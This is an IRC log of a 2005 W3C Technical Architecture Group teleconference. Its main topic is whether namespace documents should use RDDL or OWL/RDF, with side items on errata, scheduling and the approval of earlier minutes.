NW: Well, if we need a special case for something like semantic web, I'm not sure it's worth doing at all.
17:41:53 [timbl]
I have :)
17:42:01 [timbl]
(taken my choice)
17:42:31 [noah]
VQ: Time's about up. I had hoped we could decide about publishing something based on RDDL? Looks like 'no'.
17:42:49 [noah]
VQ: Let me ask the original question again: is there anything we could publish as a heartbeat from the WG?
17:42:56 [noah]
TBL: Note or working draft?
17:43:11 [noah]
VQ: A working draft would meet the heartbeat requirement. Do you have any in mind, Tim?
17:43:20 [Zakim]
+DanC
17:43:20 [noah]
TBL: No. Norm said he would write something.
17:43:31 [noah]
Dan appears to have joined the call.
17:44:02 [noah]
NW: I'm reluctant to write draft without consensus on what high level approach to attempt.
17:44:42 [ht]
q+ to say _if_ we are happy with RDDL 1.0, _then_ we can do a NOTE real quick
17:44:55 [Vincent]
ack DanC
17:44:55 [noah]
TBL: We're being lured into grabbing an answer that's lying around. This sounds like a job that's more suited to a WG that would focus on it more seriously. When we started this, RDDL looked pretty well baked.
17:45:45 [noah]
DC: We have to publish something or close the group, or get permission from the director to continue anyway. We don't have to decide what it is today.
17:46:30 [noah]
VQ: My understanding is RDDL is not ready for pub soon, and I'm asking if we have anything else to publish.
17:46:58 [noah]
TBL: What about asking Norm to write a finding discussing the RDDL/OWL questions in relation to namespaces.
17:47:12 [noah]
s/namespaces./namespaces?/
17:47:28 [DanC]
(pls let the record show we're discussing issue namespaceDocument-8, not just the heartbeat publishing requirement)
17:47:37 [noah]
NW: I could pull together a short finding talking about earlier RDDL work, and today's discussion.
17:47:42 [noah]
TBL: Would OWL be in there?
17:47:58 [noah]
NW: Yes, if it belongs at all. I know where I'd like it to come out, but this finding is where it all belongs.
17:48:07 [noah]
NW: Will try to do something this week.
17:48:09 [ht]
q- ht
17:48:15 [ht]
q+ ht
17:48:53 [noah]
DC: You're going to hit all kinds of fun stuff, such as the fact that rddl.org is a non-w3c basis for a namespace name.
17:49:49 [noah]
VQ: what's on the agenda was dan's proposal to publish something based on RDDL.
17:49:55 [noah]
DC: that was an aside.
17:50:57 [noah]
HT: I could possibly move along the finding on issue 50, which would give us something to publish.
17:51:07 [DanC]
(what HT is drafting on issue 50... doing that as a /TR/ publication would be different from the way we've done findings in the past, but not a bad idea)
17:51:25 [noah]
VQ: That would give us a first WD
17:51:37 [noah]
HT: Right, that's what I meant.
17:51:49 [noah]
HT: Do findings count as tech reports.
17:52:02 [noah]
s/tech reports/heartbeats/
17:52:06 [noah]
DC: No
17:52:17 [noah]
HT: We need discussion on that meta topic.
17:52:46 [noah]
HT: We are not working primarily in a Rec mode, and should not do backflips to fit into a process not tuned to our needs.
17:52:55 [noah]
VQ: Yes, we should discuss that.
17:52:59 [timbl]
TBL: I agree with HT
17:53:03 [DanC]
(I don't mind changing the rules. My job as team contact is to enforce them or change them. I'm happy to do either.)
17:53:18 [noah]
NRM: At next meeting?
17:53:21 [noah]
VQ: yes.
17:53:57 [noah]
VQ: Henry, can you make progress in issue 50 anyway?
17:54:03 [noah]
HT: Yes, I intend to try.
17:54:20 [noah]
Topic: Planning next F2F meeting in Boston
17:54:59 [noah]
VQ: We started some discussion about what we should do as next technical document, that we should prepare in advance, but should do that mainly face to face.
17:54:59 [Roy]
q+ to suggest we have a F2F goal for a REC track webarch volume 2 that contains only an outline
17:55:04 [noah]
This is a reminder to start that discussion.
17:55:13 [noah]
s/This/VQ: This/
17:55:24 [noah]
VQ: Ed, was there something else you wanted to ask?
17:55:42 [noah]
ED: Partly travel plans, partly wanting to focus on issues.
17:56:44 [noah]
VQ: Meeting will start morning of June 14. Some of us will leave early- to mid-afternoon of 3rd day.
17:57:03 [noah]
VQ: Please send travel plans to tag mailing list.
17:57:31 [noah]
q+ to suggest main focus should be on trying to identify what our big themes will be for next year+
17:57:49 [Roy]
9am
17:58:25 [noah]
VQ: Start time 8AM, Tues, June 14.
17:58:45 [noah]
HT: I'd prefer we go as late as possible on the 3rd day.
17:58:51 [noah]
No conflicts reported.
17:59:04 [noah]
VQ: Since there are no conflicts, we'll go a full day on the 3rd day.
17:59:11 [DanC]
(not sure that was really 8am and not 9am, but probably doesn't matter)
17:59:24 [noah]
(right, we can fine tune later.)
17:59:58 [ndw_]
ndw_ has joined #tagmem
18:01:07 [ht]
q- ht
18:01:19 [Roy]
ack Roy
18:01:19 [Zakim]
Roy, you wanted to suggest we have a F2F goal for a REC track webarch volume 2 that contains only an outline
18:01:21 [ndw]
ack roy
18:01:31 [Vincent]
q?
18:01:41 [noah]
NRM: I think priority and as much time as necessary should be given to figuring out what our big themes are for the coming year or two. Issues should be discussed, but only time permitting.
18:02:07 [noah]
RF: We could try to publish an outline for Web Arch 2. That would take most of 3 days.
18:02:08 [Vincent]
ack noah
18:02:08 [Zakim]
noah, you wanted to suggest main focus should be on trying to identify what our big themes will be for next year+
18:02:14 [DanC]
(yes, let's work on an outline; dunno if I want to publish it)
18:02:19 [Vincent]
ack danc
18:02:19 [Zakim]
DanC, you wanted to ask about xquery namespace study, and timing
18:03:25 [ndw]
DanC, please send those as LC comments!
18:03:37 [noah]
DC: I spent a lot of time working bottom up on the functions and operators stuff.
18:04:41 [noah]
DC: I think I'm suggesting the group spend some time working through those particular details.
18:05:34 [noah]
VQ: Let's wrap up the agenda discussion. I think it will be useful to have a draft agenda early. I will aim for one month in advance, which is mid May.
18:06:08 [noah]
ACTION: Vincent to prepare by mid-May a draft agenda for the June face to face meeting
18:06:09 [ndw]
We've hit my hot list for the f2f: outline WebArch V2, httpRange-14, and the issues DanC mentioned
18:06:18 [noah]
Topic: Feedback on XRI proposal
18:07:37 [noah]
ED: We've had some discussion on tag@w3.org. What's the right order for putting something on www-tag and/or sending to Oasis?
18:07:46 [timbl]
18:08:11 [noah]
s/
18:08:53 [noah]
18:09:31 [noah]
Discussing Henry's (member only) draft at:
18:09:52 [noah]
DC: we need better links to XRI docs.
18:10:07 [noah]
DC: Actually, this is close enough.
18:11:40 [noah]
TBL: This is good, but somewhat underrepresents level of detail of our analysis. Much better than nothing.
18:11:51 [noah]
HT: Should we point to the httpDNS thread in the public mailing list?
18:12:05 [DanC]
->
for names consisting of an administrative hierarchy and a path, HTTP/DNS is as good as it gets
18:12:19 [noah]
HT: I feel we should reproduce the tag@w3.org discussion on www-tag@w3.org
18:12:24 [noah]
q?
18:13:09 [noah]
q+ to say that summary correctly mentions http scheme as well as protocols, but main body opens with "we also believe that
18:13:09 [noah]
this can be provided with existing HTTP and DNS protocols"
18:13:29 [noah]
HT: I can send a package with all the emails tomorrow.
18:13:35 [DanC]
PROPOSED: to respond to XRI docs ala 0062 in the tag archive, plus public version of technical details discussed in tag@w3.org ...
18:13:49 [noah]
HT: I can then reference that and other threads in the formal response.
18:14:17 [DanC]
PROPOSED: to respond to XRI docs ala 0062 in the tag archive, plus public version of technical details discussed in tag@w3.org by HT, unless show-stoppers are raised within 2 business days
18:14:25 [Ed]
+1
18:14:31 [noah]
VQ: OK, and formal response can go out by Friday after we review
18:14:49 [noah]
VQ: who should send?
18:14:51 [DanC]
mechanics: VQ mail it to www-tag and then copy it into the OASIS form.
18:15:09 [noah]
TBL: Anybody on TAG can do as long as they correctly speak for the TAG.
18:15:24 [noah]
HT: I think it would be more polite from VQ
18:15:54 [noah]
DC: The mechanics of getting feedback to them are more complex than you'd like.
18:16:06 [noah]
TBL: Do email first so at least we have web archive copy for reference.
18:16:46 [DanC]
mechanics: VQ send to xri-comments@lists.oasis.org, cc www-tag; then take a pointer and put it in the OASIS form
18:17:24 [noah]
NRM: Suggest that Henry's note warn that we owe feedback at end of week, and that we need to focus discussion toward that goal.
18:17:36 [noah]
General agreement to that suggestion.
18:17:45 [noah]
DC: Silence is assent.
18:18:14 [DanC]
RESOLVED: to respond to XRI docs ala 0062 in the tag archive, plus public version of technical details discussed in tag@w3.org by HT, unless show-stoppers are raised within 2 business days
18:18:15 [noah]
VQ: Right, if there's no objection, I'll send Friday France time.
18:19:51 [noah]
Note that the HTTPDNS thread (note) mentioned above is at:
18:20:00 [noah]
Topic: Binary XML
18:20:17 [noah]
VQ: I see some progress in email.
18:20:36 [noah]
VQ: Ed, do you feel your action is fulfilled?
18:20:52 [noah]
ED: The working group doesn't exist, where do comments go?
18:21:08 [noah]
DC: Mailing list exists after group is gone. use public-xml-binary@w3.org
18:21:27 [noah]
VQ: Do we expect to do more?
18:21:37 [timbl]
18:21:40 [noah]
DC: Where's the list?
18:21:53 [ndw]
I agreed with Dave's points, it's a good list
18:23:24 [DanC]
18:23:40 [DanC]
DanC has changed the topic to:
18:24:09 [noah]
Discussing Ed's additions to the list at:
18:25:01 [noah]
VQ: Proposal for today is to ask everyone to check this message, and see whether we think this is our reply.
18:27:15 [Vincent]
ack danc
18:27:15 [Zakim]
DanC, you wanted to re-iterate Orchard's concerns about explaining how http/DNS addresses these issues and to
18:27:40 [noah]
NRM: Should we also get ready to signal whether and how we would contribute to the possible chartering of a new WG?
18:27:51 [noah]
TBL: That's the director's decision.
18:28:31 [noah]
NRM: I think it's for the TAG to decide whether they do or don't want to provide input to the director and/or the AC. I'm suggesting it may be constructive to do a round of thinking now about where we stand on that.
18:28:38 [noah]
DC: Do we have a draft response?
18:28:40 [noah]
No.
18:28:46 [noah]
ED: I can try to draft one.
18:29:59 [noah]
DC: I had said we should try to make a decision on issue 30 before June AC meeting. Because the team may not make that deadline anyway, the need for feedback is less urgent.
18:30:15 [noah]
VQ: Ed's help in refining this is most welcome.
18:30:18 [noah]
ED: Input solicited.
18:30:37 [noah]
NRM: Please extract from email thread as well.
18:30:39 [noah]
ED: Will do.
18:30:45 [noah]
Topic: Closing
18:30:56 [noah]
VQ: Two or three items remain.
18:31:33 [noah]
VQ: Roy, could you look at putMediaType-38. I've looked, just have to write the email. Put on agenda for next week.
18:32:12 [Roy]
I've looked, just have to write the email.
18:32:15 [Zakim]
-norm
18:32:16 [Zakim]
-Vincent
18:32:16 [Zakim]
-noah
18:32:18 [Zakim]
-DanC
18:32:18 [noah]
HT: I sent some email on httpRange-14.
18:32:23 [Ed]
suggest asking Zakim to save agenda world-access
18:32:27 [Zakim]
-??P11
18:32:29 [Zakim]
-TimBL
18:32:33 [noah]
VQ: Please send input for next agenda before next Monday, France time.
18:32:43 [Roy]
rrsagent, pointer?
18:32:43 [RRSAgent]
See
18:32:57 [Roy]
rrsagent, make minutes world readable
18:32:57 [RRSAgent]
I'm logging. I don't understand 'make minutes world readable', Roy. Try /msg RRSAgent help
18:33:15 [Ed]
Zakim save agenda world-access
18:33:30 [Ed]
(makes it public and readable)
18:33:48 [Ed]
private logs work as well :)
18:33:54 [noah]
Zakim, save agenda world-access
18:33:54 [Zakim]
the agenda has not been entered yet, noah
18:34:37 [Ed]
This happened to me last time, the IRC log was fine, but there was an invalid date at the start of the log.
18:34:59 [Ed]
I downloaded the IRC, modified the script to fix dates and then re-ran it.
18:35:02 [Zakim]
-Roy_Fielding
18:35:05 [noah]
zakim, bye
18:35:05 [Zakim]
leaving. As of this point the attendees were TimBL, noah, [INRIA], norm, Vincent, Roy_Fielding, Ht, DanC
18:35:05 [Zakim]
Zakim has left #tagmem
18:35:22 [noah]
rrsagent, draft minutes
18:35:22 [RRSAgent]
I have made the request to generate
noah
18:35:39 [Roy]
RRSAgent, make logs world-access
18:36:00 [ht]
ht has left #tagmem
18:36:29 [noah]
rrsagent, bye
18:36:29 [RRSAgent]
I see 2 open action items:
18:36:29 [RRSAgent]
ACTION: Norm to gather errata list for consideration next week. [1]
18:36:29 [RRSAgent]
recorded in
18:36:29 [RRSAgent]
ACTION: Vincent to prepare by mid-May a draft agenda for the June face to face meeting [2]
18:36:29 [RRSAgent]
recorded in | http://www.w3.org/2005/04/26-tagmem-irc | CC-MAIN-2017-30 | refinedweb | 4,961 | 79.4 |
Input fields are used to get user input in a text field.
import { Input } from '@nextui-org/react';
The default Input contains an animation effect.
Unusable and non-writable Input.
Add a clear button in the Input box.
Add a label to the Input with the property label.
With the property labelPlaceholder the placeholder becomes a label with a great animation.
Input component with a show/hide password functionality. Important: you have to use the Input.Password component.
Change the size of the entire Input, including padding, font-size, and border, with the size property.
You can change the full style towards a bordered Input with the bordered property, and you can customize the color with the color prop.
You can change the full style towards an underlined Input, like the Material effect, just by adding the underlined prop.
You can completely round the corners of any type of Input with the rounded prop.
You can change the color of the entire Input with the property status.
You can disable the shadow of the entire Input with the property shadow={false}.
You can disable the animation of the entire Input with the property animated={false}.
You can add a helper text to Input with the prop helperText and customize its color with the helperColor prop.
The first example uses the useInput hook.
You can put any content at the beginning or at the end of the Input with the properties contentLeft and contentRight.
Important: if you want the Input component to change the icon colors according to the current status color, you should use currentColor as the icon/svg color.
Change the type of the Input with the type property, as with a native HTML input; the default value is text.
type NormalColors = 'default' | 'primary' | 'secondary' | 'success' | 'warning' | 'error';
type NormalSizes = 'xs' | 'sm' | 'md' | 'lg' | 'xl';
type NormalWeights = 'light' | 'normal' | 'bold';
type ContentPosition = 'left' | 'right';
type useInput = (initialValue: string) => {
  value: string;
  setValue: Dispatch<SetStateAction<string>>;
  currentRef: MutableRefObject<string>;
  reset: () => void;
  bindings: {
    value: string;
    onChange: (event: React.ChangeEvent<HTMLInputElement>) => void;
  };
};
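As a quick illustration of the types above, here is a small type-level sketch. It is not taken from the NextUI docs: the InputProps interface below is a hypothetical, trimmed-down view of just a few of the props described on this page, showing how the documented prop names and union types combine.

```typescript
// Union types quoted from the tables above.
type NormalColors =
  'default' | 'primary' | 'secondary' | 'success' | 'warning' | 'error';
type NormalSizes = 'xs' | 'sm' | 'md' | 'lg' | 'xl';

// Hypothetical, trimmed-down subset of the Input props discussed on this page.
interface InputProps {
  bordered?: boolean;
  rounded?: boolean;
  size?: NormalSizes;
  status?: NormalColors;
  helperText?: string;
  helperColor?: NormalColors;
}

// Build the props for an error state: `status` colors the Input itself,
// `helperText`/`helperColor` style the message shown underneath it.
function errorProps(message: string): InputProps {
  return {
    status: 'error',
    helperColor: 'error',
    helperText: message,
    bordered: true,
  };
}

console.log(errorProps('Please enter a valid email'));
```

The compiler then rejects typos such as `status: 'danger'`, since only the union members listed above are valid.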
View the updated one: Part 2 - Adding user control to SharePoint 2007 (MOSS/WSS) Web Part and handling events in there - Step by Step with task pane properties.
Requirement: I have a Web User Control where I added one textbox and a button. Now I wanted to add this user control into a SharePoint Web Part. After adding this Web Part to any page, if I click the button, there should be a text “Hello World” in the Text Box.
Steps: Create a Web Part project and load the user control from the Web Part code. The Web Part class (in namespace wucwp) looks like this:

namespace wucwp
{
    [Guid("ee818646-e872-455c-a857-6e64e513539b")]
    public class wucwp : System.Web.UI.WebControls.WebParts.WebPart
    {
        UserControl userControl;
        System.Web.UI.WebControls.TextBox txtField;
        System.Web.UI.WebControls.Button showButton;

        public wucwp()
        {
            this.ExportMode = WebPartExportMode.All;
        }

        protected override void Render(HtmlTextWriter writer)
        {
            // TODO: add custom rendering code here.
            // writer.Write("Output HTML");
            userControl.RenderControl(writer);
        }

        protected override void CreateChildControls()
        {
            base.CreateChildControls();
            userControl = (UserControl) Page.LoadControl(@"/wuc/WebUserControl.ascx");
            txtField = (System.Web.UI.WebControls.TextBox) this.userControl.FindControl("TextBox1");
            showButton = (System.Web.UI.WebControls.Button) this.userControl.FindControl("Button1");
            showButton.Click += new EventHandler(showButton_Click);
            Controls.Add(userControl);
        }

        void showButton_Click(object sender, EventArgs e)
        {
            //throw new Exception("The method or operation is not implemented.");
            txtField.Text = "Hello World";
        }
    }
}
Now deploy this web part and add it to any page of your site and this should work as expected.
Update Note: One minor modification. It is better to put the WebUserControl.ascx file under the 12-Hive\TEMPLATE\CONTROLTEMPLATES folder, and access it as userControl = (UserControl) Page.LoadControl(@"/_controltemplates/WebUserControl.ascx");
Thanks Inge for your inputs.
Hi,
I have a Windows User Control(Textbox+Button) which i am adding to a web part. It would be great if you could tell me how to handle the windows user control button click event in the webpart?
First, is there a reason why you did not copy the temlate to the _controltemplates folder? It would then be accessible from any Sharepoint site.
Second, did you skip not having a seperate codebehind file because of CAS issues? This can be fixed by setting setting Full trust and copying the codebehind assembly to the bin catalog.
this help a lot for me, this is very good approach and code was very useful simple and error free
Regards,
Fareed Nizami
Software Engineer
fareed.nizami@softechww.com
Has anybody knows how to called UserControl Property Attributes in Webparts ? Because I want to set the customise property attributes for the usercontrol while loading usercontrol in webpartts.
I have a custom property defined in User control.
I want to set the user control property value from within Webpart, which is loading the user control.
When I tried that, I am not getting the property shown in the webpart while accessing the user control.
Is there a way to achieve this.
Regards.
Do u have idea on how to load the Sharepoint user control like ( ToolBar.ascx ) in custom webpart
Thanks
I tried this but I got my user control rendering in the upper left quadrant of the Sharepoint page, not in the web part. I am overriding CreateChildControls and RenderContents as mentioned above. Do I need to use code similar to this?:
Control uc = this.LoadControl(@"webparts\CompanyNews.ascx");
uc.ID = "wp2";
GenericWebPart wp2 = WebPartManager1.CreateWebPart(uc);
WebPartManager1.AddWebPart(wp2, WebPartZone1, 1);
Another question... if I use GenericWebPart and WebPartManager.CreateWebPart (and AddWebPart), would Controls.Add(userControl) even work anymore (as far as wiring up the user controls events to the Page)?
Would I then need to grab a reference to every control within my user control and add an event in my web part if I wanted to respond to a button click within my user control (assuming the button click event in my user control gathers all the inputs from all the controls within the user control)?
Sorry for being wordy, but I'm frazzled beyond belief right now and am in dire need of quick answers to all the questions I laid out in my post. I would be glad to return the favor to anyone who helped me out.
Thank you.
this.ExportMode = WebPartExportMode.All; error ?
I follow the code above when I import the .dwp in webpartzone I got this error
Unable to add selected web part(s). The
Namespace.classname class does not derive from the Microsoft.SharePoint.WebPartPages.WebPart class and therefore cannot be imported or used in a WebPartZone control. If you inherit Microsoft.SharePoint.WebPartPages.WebPart instead of webcontrol it works but events are not fired.
hi
it's really good article.....
thanks..
I have a question..
What if I have a event declared in the User Control, and raise the event.
How can I subscribe for that event when you are dynamically loading the control.
Thanks in advance.
I am brand new to ASP, SharePoint and only moderately acquainted with C# but not in the ASP or SharePoint arena at all. This may be why I cannot get this example to work.
I have copied the steps exactly as they are laid out above. I changed the LoadControl to point to "/_controltemplates/WebUserContol.ascx" as suggested. That file is located at C:\Program Files\Common Files\Microsoft Shared\web server extensions\12\TEMPLATE\CONTROLTEMPLATES on the server.
Everything is being tested and debugged on the server.
When I deploy the web part from VS and then go to the Site Settings in SharePoint and click on Web Parts in the Gallery section I see my new web part is added. If I click on it to see a preview of it I always get an error. That error changes from one version to another. Most of the time it is "Unknown Error" but I have seen "File not found".
Any suggestions?
Thanks,
Robert
hi,
i m using this code as it is, but the problem is that i add this user control to web part and click the nothing happened(in this case hello world not appread in text box)
can anyone tell why my events are not firing.
this event hanlding problem occuring in my all user controls.
kindly help me urgently
thanks in advance
could you please let me know how a user control with a Databound dropdown list could be displayed?
I mean the dropdown list gets data from a database. Do I need to create an instance of the datasource again in the class library file?
Could you please help
Aditi | http://blogs.msdn.com/b/pranab/archive/2007/11/30/adding-user-control-to-sharepoint-2007-moss-wss-web-part-and-handling-events-in-there.aspx | CC-MAIN-2015-32 | refinedweb | 1,085 | 58.28 |
Libraries for GNOME, a GNU desktop environment
WWW:
NOTE: FreshPorts displays only required dependencies information. Optional dependencies are not covered.
No installation instructions: this port has been deleted.
The package name of this deleted port was: gnomelibs
gnomelibs
No options to configure
Number of commits found: 75
x11/gnomelibs -> x11/gnome-lib japanese/gnomelibs, chase the rename.
PR: ports/97985
Repocopy by: marcus
portlint:
-Use DOCSDIR in plist.
Add USE_GETTEXT to appease portlint.
Remove USE_REINPLACE from categories starting with X change permissions and group ownership of the share/gnome/games
directory. Leave that up to gnomeh.
Protect target with .if target(...) ... .endif for targets that are
redefined by a slave port.
Fix build on -CURRENT.
GNOME has just changed the layout of their FTP site. This resulted in
making all the distfiles unfetachable. Update all GNOME ports that fetch
from MASTER_SITE_GNOME to fetch from the correct location.
Fix a problem with word selection in gnome-terminal. Bump PORTREVISION.
Update to 1.4.2.
Fix patch, so that it actually applies.
Fix a problem with GNOME and XIM compatibility. Bump PORTREVISION.
PR: 40125
Submitted by: sf
Pointy hat to: marcus 1.4.1.7.
- Move misc documentation into share/doc where it belongs;
- use USE_LIBTOOL while I here;
- make gnome-hint from gnomecore actually working;
- bump PORTREVISIONs.
Hack for better hier(7) conformance - install libart documentation into
${PREFIX}/share/doc.
Clean up the plists some.
* "Share" directories such as share/gnome, share/gnome/pixmaps, and etc/sound
between both GNOME 1.4 and GNOME 2.0.
* Remove some @dirrm's from gtm that were already in dependency ports.
Update to 1.4.1.6.
Fix installation is gtk-doc is also installed.
Note, since it seems like a number of ports are broken when gtk-doc is
also installed, I wonder if adding --disable-gtk-doc to all their
CONFIGURE_ARGS isn't a bad idea.
Reviewed by: sobomax
Approved by: sobomax
Update to 1.4.1.5.
Prevent libc from being explicitly linked into shared libs. Bump PORTREVISION.
Update to 1.4.1.4.
Update to 1.4.1.3.
Fix a null pointer dereferencing bug in gtk-xmhtml library observed when
browsing evolution documentation. Bump PORTREVISION.
Some of the GNOME components now install their include files into
${PREFIX}/include/gnome-1.0 instead of plain ${PREFIX}/include, so make
gnome-config return appropriate cpp(1) flags necessary to find those headers.
Bump PORTREVISION accordingly.
Allow japanese/gnomelibs to add LIB_DEPENDS:
Update to 1.4.1.2.
Update to 1.4.1.1.
Unbroke on alpha.
Add textproc/libxml as an explicit dependency, as well as the implicit
dependency through textproc/scrollkeeper. Something strange is going on here,
and this is a reasonable temporary fix.
Remove empty patchfile that got left around sometime.
SWitch maintainership of core GNOME ports to a small group of committers
(gnome@FreeBSD.org), since this is now definitely too big for just one person.
Missed patch from the update causing an mtree failure.
Update to GNOME 1.4 -- massive changes all around, for the sake of CVS repo
bloat, I'll only list the updates.
-pthread --> ${PTHREAD_LIBS} -D_THREAD_SAFE --> ${PTHREAD_CFLAGS}
Style fixes for ports/x11.
It's another day. Update to 1.2.11
Another day. Another GNOME release. 1.2.10 here
Allow CATEGORIES to be overriden by the respective japanese/* ports (and
others, should they ever be born)
*sigh* missed a relatvely important patch, at least from a packaging PoV Bump
PORTREVISION accordingly.
Update to 1.2.9 -- bring in a few pieces of documentation here which slightly
change a few other ports.
Conditionally set MAINTAINER, so that the japanese slave ports DTRT
Let the Ade deal with this.
Bump PORTREVISION as a result of my previous commit (sound fix).
Make sound working again.
Update to 1.2.8
Update to 1.2.7
Update to 1.2.6
Update to 1.2.5
Convert category x11 to new layout.
Implement WANT_IMLIB and USE_IMLIB.
Remove scsh from "known shells".. it's not an interactive shell.
Allow gnomelibs to DTRT in the case where ${LOCALBASE} is not /usr/local
Add fix for GNOME forcibly trying to set the locale to en_US under certain
circumstances.
Re-sobomize to use pre-patch instead of post-extract
Extensive patchfile cleanups using sobomax's wonderful post-extract typos
Update to 1.2.4
Update to 1.2.3
Update to 1.2
bt_ldev_set_filters()
This function allows you to enable or disable BT_EVT event triggering from bt_device_cb.
Synopsis:
#include <btapi/btdevice.h>
int bt_ldev_set_filters(int event, bool enable)
Since:
BlackBerry 10.3.0
Arguments:
- event
The BT_EVT to enable or disable. Use BT_EVT_ALL_EVENT to represent all events.
- enable
If set to true, the event triggers bt_device_cb. If set to false, the event does not trigger bt_device_cb.
Library:libbtapi (For the qcc command, use the -l btapi option to link against this library)
Description:
Use BT_EVT_ALL_EVENT to enable or disable all events. The default value is no event filtering.
Returns:
- ENOMEM: Sufficient memory is not available to perform the request.
- ESRVRFAULT: An internal error has occurred.
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | https://developer.blackberry.com/native/reference/core/com.qnx.doc.bluetooth.lib_ref/topic/bt_ldev_set_filters.html | CC-MAIN-2020-10 | refinedweb | 133 | 62.44 |
- Patch libmemcache
- Compile and install libmemcache
- sudo apt-get install python-dev
- sudo python setup.py install
- Download the actual memcached, compile and install
- Use it (StringClient for strings, Client uses pickle for other types):
It's been a while since I used patch, so I thought I'd record the command I used. This was a multifile patch, and it applies the patches to all the right files. How cool is that! The -p1 prunes off one slash of the path since my directory was different to the guys who made the patch.
patch -b -p1 -i libmemcache-1.4.0.rc2.patch
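For reference, here is a tiny self-contained rehearsal of that command on hypothetical throwaway files (not the real libmemcache patch), showing what -p1 and -b actually do:

```shell
# Build a toy tree, diff it against a modified copy, then apply the
# resulting patch from inside the tree with one path component stripped.
mkdir -p demo/a/src demo/b/src
printf 'hello\n'   > demo/a/src/file.txt
printf 'goodbye\n' > demo/b/src/file.txt
cd demo
diff -ru a b > ../change.patch || true   # diff exits 1 when files differ
cd a
patch -b -p1 -i ../../change.patch       # -p1 strips the leading a/ (or b/)
cat src/file.txt                          # patched content
cat src/file.txt.orig                     # -b kept a backup of the original
```

The patch header names files as a/src/file.txt and b/src/file.txt, so -p1 prunes one slash's worth of path, leaving src/file.txt relative to the current directory, and -b saves the pre-patch file as file.txt.orig.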
import cmemcache
a=cmemcache.StringClient(["127.0.0.1:11211"])
a.set('key', 'value')
a.get('key')
1 comment:
Which version of cmemcached did you install? | http://ilostmynotes.blogspot.com/2008/04/python-memcached.html | CC-MAIN-2017-34 | refinedweb | 130 | 76.11 |
The UNIX-HATERS Handbook®

“Two of the most famous products of Berkeley are LSD and Unix. I don’t think that is a coincidence.”

Edited by Simson Garfinkel, Daniel Weise, and Steven Strassmann

Illustrations by John Klossner

IDG Books Programmers Press
IDG Books Worldwide, Inc. An International Data Group Company
San Mateo, California • Indianapolis, Indiana • Boston, Massachusetts
The UNIX-HATERS Handbook
Published by IDG Books Worldwide, Inc.
An International Data Group Company
155 Bovet Road, Suite 310
San Mateo, CA 94402

Copyright 1994 by IDG Books Worldwide. All rights reserved.
About IDG Books Worldwide

Welcome to the world of IDG Books Worldwide. IDG Books Worldwide, Inc., is a subsidiary of International Data Group, the world’s largest publisher of business and computer-related information and the leading global provider of information services on information technology. IDG was founded over 25 years ago and now employs more than 5,700 people worldwide. IDG publishes over 195 publications in 62 countries. Forty million people read one or more IDG publications each month.

Launched in 1990, IDG Books is today the fastest growing publisher of computer and business books in the United States. We are proud to have received 3 awards from the Computer Press Association in recognition of editorial excellence, and our best-selling “…For Dummies” series has over 7 million copies in print with translations in more than 20 languages. IDG Books, through a recent joint venture with IDG’s Hi-Tech Beijing, became the first U.S. publisher to publish a computer book in The People’s Republic of China. In record time, IDG Books has become the first choice for millions of readers around the world who want to learn how to better manage their businesses.

Our mission is simple: Every IDG book is designed to bring extra value and skill-building instruction to the reader. Our books are written by experts who understand and care about our readers. The knowledge base of our editorial staff comes from years of experience in publishing, education, and journalism—experience which we use to produce books for the 90s. In short, we care about books, so we attract the best people. We devote special attention to details such as audience, interior design, use of icons, and illustrations. And because we write, edit, and produce our books electronically, we can spend more time ensuring superior content and spend less time on the technicalities of making books. You can count on our commitment to deliver high quality books at competitive prices on topics you want to read about. At IDG, we value quality, and we have been delivering quality for over 25 years. You’ll find no better book on a subject than an IDG book.

John Kilcullen
President and CEO
IDG Books Worldwide, Inc.
Table of Contents

Foreword ... xv
    By Donald A. Norman
Preface ... xix
    Things Are Going to Get a Lot Worse Before Things Get Worse
    Who We Are ... xxi
    The UNIX-HATERS History ... xxiii
    Contributors and Acknowledgments ... xxix
    Typographical Conventions ... xxxii
    The UNIX-HATERS Disclaimer ... xxxiii
Anti-Foreword ... xxxv
    By Dennis Ritchie

Part 1: User Friendly? ... 1

1 Unix ... 3
    The World’s First Computer Virus
    History of the Plague ... 4
    Sex, Drugs, and Unix ... 9
    Standardizing Unconformity ... 10
    Unix Myths ... 14

2 Welcome, New User! ... 17
    Like Russian Roulette with Six Bullets Loaded
    Cryptic Command Names ... 18
    Accidents Will Happen ... 19
    Consistently Inconsistent ... 26
    Online Documentation ... 31
    Error Messages and Error Checking, NOT! ... 31
    The Unix Attitude ... 37

3 Documentation? ... 43
    What Documentation?
    On-line Documentation ... 44
    This Is Internal Documentation? ... 51
    For Programmers, Not Users ... 54
    Unix Without Words: A Course Proposal ... 56

4 Mail ... 61
    Don’t Talk to Me, I’m Not a Typewriter!
    Sendmail: The Vietnam of Berkeley Unix ... 62
    Subject: Returned Mail: User Unknown ... 67
    From: <MAILER-DAEMON@berkeley.edu> ... 74
    Apple Computer’s Mail Disaster of 1991 ... 85

5 Snoozenet ... 93
    I Post, Therefore I Am
    Netnews and Usenet: Anarchy Through Growth ... 93
    Newsgroups ... 96
    Alt.massive.flamage ... 100
    This Information Highway Needs Information ... 100
    rn, trn: You Get What You Pay for ... 101
    When in Doubt, Post ... 105
    Seven Stages of Snoozenet ... 106

6 Terminal Insanity ... 111
    Curses! Foiled Again!
    Original Sin ... 111
    The Magic of Curses ... 114

7 The X-Windows Disaster ... 123
    How to Make a 50-MIPS Workstation Run Like a 4.77MHz IBM PC
    X: The First Fully Modular Software Disaster ... 124
    X Myths ... 127
    X Graphics: Square Peg in a Round Hole ... 141
    X: On the Road to Nowhere ... 142

Part 2: Programmer’s System? ... 145

8 csh, pipes, and find ... 147
    Power Tools for Power Fools
    The Shell Game ... 148
    Shell Programming ... 155
    Pipes ... 161
    Find ... 166

9 Programming ... 173
    Hold Still, This Won’t Hurt a Bit
    The Wonderful Unix Programming Environment ... 175
    Programming in Plato’s Cave ... 176
    “It Can’t Be a Bug, My Makefile Depends on It!” ... 186
    If You Can’t Fix It, Restart It! ... 198

10 C++ ... 203
    The COBOL of the 90s
    The Assembly Language of Object-Oriented Programming ... 204
    Syntax Syrup of Ipecac ... 208
    Abstract What? ... 211
    C++ Is to C as Lung Cancer Is to Lung ... 214
    The Evolution of a Programmer ... 215

Part 3: Sysadmin’s Nightmare ... 219

11 System Administration ... 221
    Unix’s Hidden Cost
    Keeping Unix Running and Tuned ... 223
    Disk Partitions and Backups ... 227
    Configuration Files ... 235
    Maintaining Mail Services ... 239
    Where Did I Go Wrong? ... 241

12 Security ... 243
